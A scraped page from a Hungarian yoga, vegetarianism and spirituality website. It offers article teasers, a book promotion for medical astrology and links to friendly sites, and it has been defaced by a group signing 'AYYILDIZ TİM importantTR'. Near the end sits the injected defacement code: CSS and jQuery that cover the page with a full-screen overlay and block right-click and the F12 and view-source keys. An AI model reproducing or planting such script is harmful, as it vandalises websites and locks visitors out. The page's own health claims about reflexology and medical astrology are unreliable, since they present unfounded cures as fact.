Menu Content/Inhalt

Internetes imamalom

Imamalom

Barátaink

1000tea

RSS - Recept ajánló

AYYILDIZ TİM importantTR HACKED / no war usa israel

Mai gondolat

Jobb gyertyát gyújtani, mint átkozni a sötétséget. (Kínai mondás)

Kedves Látogatónk!

Bizonyára rendelkezik olyan tapasztalattal, ami másvalaki számára éppen a megfelelõ útbaigazítás lenne, hogy megtalálja, ami számára fontos. Ha úgy gondolja, hogy szívesen megosztaná tudását honlapunk többi olvasójával, kérjük küldje el nekünk írásait, képeit. Minden olyan anyagot örömest közzéteszünk, ami az ahimsa - nem ártani - szellemiségének nem mond ellent.
Advertisement

Jóga - cikkajánló

Relaxáció - Az elengedés mûvészete
ImageTest és lélek rendkívül szoros kapcsolatban áll egymással. Lelki feszültségeink nem csak a külvilág felé való megnyilvánulásunkban mutatkoznak meg, hanem izmaink tónusában, feszültségeiben, görcsiben is felfedezhetõk. Az izmok megszokásból kialakult feszültsége visszahat lelki állapotunkra is, tehát abban az esetben is fennállhat feszültség, amikor szituáció nem ad okot rá és érzelmileg sem indokolt.
Tovább...
 

Vegetáriánizmus - cikkajánló

Anthony Strano: Az erõszakmentesség jelentése II.
ImageAmikor egy személy megérti ezeknek az alapelveknek a realitását, akkor az életstílusa természetes módon erõszakmentessé válik. Az érzelmeinkben erõszaktól szenvedtünk és másoknak is erõszakot adunk. Az érzelmi erõszak, mint a gyûlölet, a bosszú, az elutasítás, ezek mind a megbocsátás hiányának okai, annak, hogy nincs tolerancia és nincs öntisztelet.
Tovább...
 

Természetgyógyászat - cikkajánló

A talpreflexológia
ImageIgen jelentõs viszont ezeknek a zónáknak a szerepe vitalitásunk megõrzése szempontjából. Az egész életükön át keményen dolgozó emberek nagyrészt annak köszönhetik kifogástalan egészségüket és hosszú élettartamukat, hogy a nehéz fizikai munka minden reflexzónájukat alaposan megmozgatja, ami a kezdõdõ betegségek automatikus gyógyulását váltja ki. Mellékesen megjegyezve a henyélés közvetlenül is beteggé tehet bennünket...
Tovább...
 

Szellemi táplálék...

Jó és rossz tulajdonságainkkal együtt születtünk, de rajtunk múlik, melyiket érvényesítjük az életben. (Tatiosz)

KÖNYVAJÁNLÓ

ImageKaló Jenõ: A gyógyulás szelencéje - Az orvosi asztrológia kézikönyve I-III. kötet
Az asztrológia a világ leképezését jelenti, utat a transzcendens felé, egyfajta beavatást a Mindenség lényegéhez, az egységhez. Az orvosi asztrológia lehetõséget biztosít, hogy megértsük betegségeink természetét, hogy mi húzódik meg azok lelki hátterében. Megmutatja, melyek azok a belsõ kényszerítõ erõk, amelyek következményeként az adott betegség jelentkezik. A betegség azt jelenti, hogy az egyén nem képes arra, hogy egész legyen, vagyis nem a maga útját járja, hanem letér arról. Minden megtorpanás, minden zsákutca, minden letérés azokat az erõket mozgósítja, amelyek – olykor akár fájdalommal, akár betegség formájában – abban segítenek, hogy visszatérjünk a saját utunkra. Betegségünk segít, hogy elérjük legfontosabb célunkat: megvalósítani Önmagunkat.
A megújult, bõvített formában megjelent elsõ kötet bevezetést ad az asztrológia alapfogalmaiba, létfilozófiájába és bemutatja az orvosi asztrológia gyakorlati alkalmazásának lehetõségeit. A betegségcsoportok közül három nagy területre tér ki: megtárgyalja az idegrendszer idegi és pszichés irányú betegségeit, a belsõ elválasztású mirigyrendszer legfontosabb betegségeit, és az érzékszervek közül a legfontosabb szem- és fülbetegségeket. A második kötet pedig a további testi területek betegségeivel, pl. a táplálkozás, a légzés, a kiválasztás, a keringés, a bõr és a mozgás szervrendszerének elváltozásaival, illetve azok lelki hátterével és asztrológia megfeleltethetõségeivel foglalkozik. Az összefüggések jobb megértése végett mindkét kötetben közel 50 horoszkópábra és azok értelmezése segíti az olvasót. A harmadik kötetben helyet kapnak a keringési rendszer további problémái, az immunrendszerünk összefüggései és azok betegségei, a bõr és a mozgásszerv-rendszer megbetegedései, valamint a szaporodás biológiája, s itt a betegen született emberekrõl is szó esik. Külön fejezet tárgyalja a balesetek asztrológiai összefüggéseit.
 

Vallási turizmus, zarándoklatok

Minden vallás ismeri a zarándoklatok és az elvonulások jótékony hatásait, ahol a hangsúly a külsõ helyett a belsõre kerül: zarándoklatok, búcsúk, kegy- és emlékhelyek, elvonulások és lelki gyakorlatok – ez jellemzi a napjainkban világszerte újra felvirágzásnak indult vallási turizmust. vallasiturizmus.lap.hu
 

Hinduizmus - cikkajánló

Shri Mataji Nirmala Devi
Image1970. május 5-én egy Bombay-tól 150 mérföldnyire lévõ tengerparti faluban, Nargolban, elérte ezt a tapasztalást és Sahasrara csakrájának megnyílását. Ezután utazni kezdett, hogy felébressze a Kundalinit az emberek tömegeiben. Így jellemezte a Sahasrara csakra megnyitását: "Úgy láttam a Kundalinit, mely az Õsi Erõ bennünk, a Szentlélek bennünk, mint egy kinyíló teleszkópot. Ezután láttam az egész dolgot nyitva és sugarak nagy esõzuhataga kezdett folyni a fejemen keresztül, mindenütt."
Tovább...
 

Buddhizmus - cikkajánló

Dhammapada - A Tan ösvénye
Image"44. Ki fogja legyõzni a földet és
a halál birodalmát és az eget?
A Tan ösvényét ki találja meg,
akár a virágot a fürge szem?
45. A keresõ gyõzi le a földet és
a halál birodalmát és az eget.
A Tan ösvényét õ találja meg,
akár a virágot a fürge szem."
Tovább...
 

Iszlám - cikkajánló

Bevezetés az iszlámba
ImageKülönösen ki kell hangsúlyoznunk azt, hogy az Iszlámban a nõket nagyon tisztelik. Szó sincs arról, hogy az asszonyoknak nincs lelke, és õk lennének minden rossz forrásai, vagy, hogy alá vannak rendelve a férfiaknak, és elnyomásban kell tartani õket. Az iszlám vallás a nõt teljes jogú partnernek tekinti a házasságban. A házaspárt a Korán egymás lakóhelyének nevezte és a megnyugvás és vigasztalás forrását jelentik egymásnak. És, hogy megmutassa az Iszlám vallás az anyaság kiemelkedõ helyzetét és szentségét a Próféta (Béke Legyen Vele) a hagyomány szerint azt mondta: "a Paradicsom az anyák lábánál van".
Tovább...
 
Image
 
HTML: AYYILDIZ TIM body, html { margin:0; padding:0; min-height:100%; min-width:100%; overflow:hidden;} #ud_preloader { position:fixed; top:0; left:0; right:0; bottom:0; width:100%; height:100%; z-index:10000;} #ud_preloader .ud_pre_half { background:#111; width:50%; height:100%; position:absolute; top:0; bottom:0;} #ud_preloader #ud_bg_left { left:0;} #ud_preloader #ud_bg_right { right:0;} #ud_preloader #ud_dots { z-index:10001; width:150px; position:absolute; top:50%; left:50%; transform:translateX(-50%) translateY(-50%);} #ud_preloader #ud_dots img { width:100%; margin:0 0 30px 0; } #ud_preloader #ud_dots .ud_dot { animation: infinite 500ms ease-in-out; border-radius:30px; width:30px; height:30px; background:#fff; float:left; margin:0 10px 0 0;} #ud_preloader #ud_dots .ud_dot:last-child { margin:0 0 0 0;} @keyframes ud_preloader_1 { 0% { background:#fff; transform:translateY(0);} 25% { background:#DF0101; transform:translateY(-5px);} 50% { background:#fff; transform:translateY(0);} } @keyframes ud_preloader_2 { 25% { background:#fff; transform:translateY(0);} 50% { background:#DF0101; transform:translateY(-5px);} 75% { background:#fff; transform:translateY(0);} } @keyframes ud_preloader_3 { 50% { background:#fff; transform:translateY(0);} 75% { background:#DF0101; transform:translateY(-5px);} 100% { background:#fff; transform:translateY(0);} } @keyframes ud_preloader_4 { 75% { background:#fff; transform:translateY(0);} 100% { background:#DF0101; transform:translateY(-5px);} 25% { background:#fff; transform:translateY(0);} } .bar{ position:absolute; top:15%; left:0; width:100%; } svg{ width: 600px; height: 120px; display: block; position: relative; overflow: hidden; margin: 0 auto; } $(document).ready(function() { $('#ud_dots').delay(750).fadeOut(300,function() { $('#ud_bg_left').animate({left: '-50%'},300); $('#ud_bg_right').animate({right: '-50%'},300,function() { $('#ud_preloader').fadeOut(10); }); }); var blockDiv = $(document.createElement('div')) .attr('id', 'blockDiv').height('100%').width('100%') .css({'z-index':'3333', 'position' : 'absolute', 'top': '0', 'left':'0'}); $('body').append(blockDiv); $(function() { $(this).bind("contextmenu", function(e) { e.preventDefault(); }); }); $(document).keydown(function(e){ if(e.which === 123){ return false; } if(e.which === 17){ return false; } if(e.which === 85){ return false; } }); });
text { filter: url(#filter); fill: white; font-family: 'Share Tech Mono', sans-serif; font-size: 100px; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } HACKED BY
importantTR



 

A Világ Tanítói

Get the Flash Player to see this player.
Flash Image Rotator Module by Joomlashack.
Ajaib Singh
Prabhupada
Ching Hai
Steiner
Kriyananda

Barátaink

Siddhartha.hu
Santmat
Kepesseg
Aranyhegy
Body Talk
Asztrológia